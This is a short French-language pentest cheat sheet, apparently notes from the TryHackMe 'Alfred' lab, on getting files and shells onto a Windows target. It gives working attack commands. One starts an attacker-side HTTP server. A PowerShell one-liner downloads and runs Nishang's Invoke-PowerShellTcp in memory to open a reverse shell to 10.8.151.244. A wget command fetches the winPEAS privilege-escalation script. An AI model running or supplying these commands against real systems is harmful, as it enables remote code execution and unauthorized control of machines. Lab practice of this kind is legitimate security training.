--->WINDOWS DOWNLOAD FILE

-> Sur la machine d'attaque : 
python3 -m http.server 8000

--> Sur Windows powershell pour lancer un revserse shell :
powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.151.244:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.151.244 -Port <port_du_netcat>

-> https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1


--> Sur Windows powershell :
powershell -c wget "http://10.8.151.244:8000/winPEAS.ps1" -outfile "winPEAS.ps1"


----
https://tryhackme.com/room/alfred

https://github.com/samratashok/nishang
----
